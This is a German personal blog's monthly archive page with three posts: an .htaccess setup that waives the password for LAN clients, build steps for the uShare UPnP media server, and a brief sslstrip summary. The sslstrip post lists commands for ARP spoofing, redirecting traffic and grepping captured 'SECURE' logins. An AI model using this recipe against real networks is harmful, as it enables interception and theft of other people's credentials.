The Sandpit from Sam O'Hare on Vimeo.
You are currently browsing the monthly archive for February 2010.
Auf meinem Homeserver läuft unter anderem ein Apache Webserver um ggf. von extern auf Daten zuzugreifen. Da ich aber nicht möchte das jeder von Extern so ohne weiteres auf meine Daten zugreifen kann, ist das root Verzeichnis des Apache’s mit einem .htaccess Passwortschutz versehen. Allerdings musste ich bis jetzt auch von meinem lokalen LAN, also von zu Hause aus ebenfalls Benutzername und Kennwort eingeben um auf meine Daten zuzugreifen. Daher habe ich die .htaccess wie folgt angepasst:
AuthUserFile "/pfad/zum/wwwroot/.htpasswd" AuthType Basic AuthName "Geschützt" require valid-user
Erweitert mit:
Order deny,allow Deny from all Allow from 192.168 Satisfy any
Ich habe seit geraumer Zeit ein Alix2d3 Homeserver, welcher soweit auch hervoragend läuft. Da ich im Wohnzimmer auch ganz gern mal vor der Xbox360 hänge und darüber auch mal Videos bzw. aufgenommene TV-Serien schaue, war es bisher immer ein wenig nervig mein Notebook als UPNP-Media-Player bzw. Server laufen zu lassen. Da der Homeserver aber eh 24/7 läuft und auch als Fileserver dient, habe ich mich also mal nach einer UPNP Mediaserver alternative für Debian umgeschaut und “GeeXboX uShare” gefunden! Dadurch habe ich jetzt die Möglichkeit ein Verzeichnis auf dem Debian Homeserver (Lenny) freizugeben und von dort aus die Videos zu streamen um diese dann über meine Xbox360 zu schauen.
Und so wirds gemacht:
Download: libupnp 1.6.2
tar jxvf libupnp-1.6.2.tar.bz2 cd libupnp-1.6.2/ ./configure --prefix=/usr make sudo make install
Download: ushare 1.1a
tar jxvf ushare-1.1a.tar.bz2 cd ushare-1.1a/ ./configure --prefix=/usr make sudo checkinstall ln -s /usr/bin/ushare /bin/ushare
Und dann starten mit:
ushare -n servname -p 49153 -c /dir/to/share/ -x
Checken ob er erreichbar ist:
http://<ip-des-servers>:49153/web/ushare.html
Hier ein Video von Pauldotcom, welches beschreibt wie man mit sslstrip-0.2 relativ einfach SSL Verbindungen sniffen kann. Hier noch eine Seite die das SSL sniffen in WLANs beschreibt.
SSLStrip from John Strand on Vimeo.
Also hier nochmal kurz zusammengefasst:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t TARGETIP GATEWAYIP
python ./sslstrip.py -a -l 8080
um das interessanteste auszulesen:
cat sslstrip.log | grep SECURE